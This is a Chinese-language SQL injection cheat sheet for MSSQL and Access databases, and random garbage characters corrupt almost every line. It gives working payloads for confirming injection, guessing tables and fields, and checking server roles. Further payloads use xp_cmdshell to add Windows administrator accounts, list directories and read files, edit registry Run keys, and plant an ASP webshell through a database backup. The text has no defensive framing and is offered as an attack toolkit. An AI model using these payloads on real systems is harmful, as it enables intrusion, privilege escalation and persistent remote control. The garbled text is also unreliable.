1.判断是否有注入;and 1=1 ;and 1=2 s��w���rd
2.初步判断是否是mssql ;and user>0 sTz�*tSwQv
k_B^2����=
3.注入参数是字符'and [查询条件] and ''=' H"l'E9k.&p
a�{W-+t��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �kz^G.5n �
rge/jE,^~Z
5.判断数据库系统 !A�o�?bs�'
�l�Ou�i{QU
;and (select count(*) from sysobjects)>0 mssql yNL71�>�w4
+�|;I��Iwo
;and (select count(*) from msysobjects)>0 access 4�K�nDXQ%
nabN.��Ly�
�L?fv5 S3
#��UQ[8e��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e)�kf;�Hkf
/slML~$t<
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 9�@0�6]EI_
7G��o�!W(8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ���=���F4}
��0"N %�Vm
9.(1)猜字段的ascii值(access) Tx(R3B+u7�
f7'%AuS�Q(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "�6i9�f�$N
`O/�)q^m1L
(2)猜字段的ascii值(mssql) $BY{:#��a]
51���vK�>�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 5hAg*zJb5o
P�R+!CF�i&
10.测试权限结构(mssql) �?�x�@khzk
$�/H'Dt6�x
d9�(F��wmE
=�j0V/=���
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- X#y���l8k_
jY�kx]J%�S
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1yu!:8=�ee
$m>�e!P>%u
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- v�|GvN|_|�
�P7b2I�=t�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q�V��pZA,
�$gNCS:VG*
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- K�B5{��l%>
|zMQe}R@%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- o2~x�'*A0I
w�9�%gaK�;
;and 1=(select IS_MEMBER('db_owner'));-- �,#G@ri:B�
� pK�4)�>q
_OY��;�SJ(
&Bg�aFx*�*
11.添加mssql和系统的帐户 ��L*z;��-,
hk
�I$ow�(
;exec master.dbo.sp_addlogin username;-- �aI{[W;43T
;exec master.dbo.sp_password null,username,password;-- �J�:5n/m^A
gT.-C���f{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- o;.-I[�9h]
�}/VHeH�d
;exec master.dbo.xp_cmdshell 'net user username password v09f�#t$;5
�oZ}e
w!V�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- jhL�h~.�
8
D&shrK��Fx
;exec master.dbo.xp_cmdshell 'net user username password /add';-- zi��n��,yJ
C\{4�<:<_&
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !4E:�IM�63
H2]I__�t/u
N�QG�"}=KA
�wb}tN7~Y;
12.(1)遍历目录 �",}V�B�8K
)nY/ �RO
;create table dirs(paths varchar(100), id int) /�dfZ>�k8�
�;Y"J� �j�
;insert dirs exec master.dbo.xp_dirtree 'c:\' Ol? 2Qy.2)
3�X:F9�x>y
;and (select top 1 paths from dirs)>0 =N=,�;<6%A
G�<-.{Gx)�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z8��T{Xw6%
Q-�"FmD-Yw
��;Gi w7a)
u7���m�j�
(2)遍历目录 :.d�QY=6�I
�mT.F$Y��9
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �B$b�s�h.�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 BW�s\���'B
� rLwc=(|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
; H�3kb
+
�d|�TI�rlA
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 UW+�I �8\^
8�X%;29tow
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 $\bH�5|Hk]
@:[/�u�q�L
nX�N0~,�+�
���&^<94�l
13.mssql中的存储过程 �I$Z"o9�"�
+|.#<]GA��
xp_regenumvalues 注册表根键, 子键 �{b?)|@)is
/EC� m����
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _�ReQQti[�
"K8qmgg�Tq
xp_regread 根键,子键,键值名 !�-QKh� aY
Rw�r�0$_�A
;exec xp_regread ,y0�kzwPR1
;#�;X�@BhS
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �g�Q�?k�}D
+o/q@&v;Ax
xp_regwrite 根键,子键, 值名, 值类型, 值 �$�d��"6�y
Ev()2 ��80
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 %$cwbh-{{�
5��`�+*�({
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9J?�j2!D�
%=]{~5f>��
xp_regdeletevalue 根键,子键,值名 L^=>)\R2$[
+�q�4T]�;<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 '.iUv#j4Sh
!B\\:k]aO^
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 G�67BQG\av
}$�7Hf+��G
{*�|�y��U"
dl�W���w=^
14.mssql的backup创建webshell p?}�R�olk7
:>,d$f^tqE
use model �M6e"��4Gh
H�1��l'�\�
create table cmd(str image); Ki'����EO$
@�1>83-p"X
insert into cmd(str) values (''); '���;�1�
c
q%�JV�"9�,
backup database model to disk='c:\l.asp'; YFW+l~[#��
n\ IVp�g�P
�YB 4R8�}4
T1x$v,)�8x
15.mssql内置函数 ��F;zmq%rK
U'��\\�(m|
;and (select @@version)>0 获得Windows的版本号 =3}+f�-6"'
�Ox�D\e5r�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �!PO�(Bfd
d`:0kOF+�
;and (select user_name())>0 爆当前系统的连接用户 04(�h!@!g:
A.�y$��.(�
;and (select db_name())>0 得到当前连接的数据库 ��_|*�j8v3
Y)�uN�zb6R
�#>233<���
��1D�*e��u
16.简洁的webshell ,��� vk�y�
[X�-Q��{c4
use model "aP/2�14Ul
2/;��KZ+U&
create table cmd(str image); vj#gY2q��Z
i�c3qb<�2
insert into cmd(str) values (''); AL�KhZFu�z
p@!"x({@�l
backup database model to disk='g:\wwwtest\l.asp';
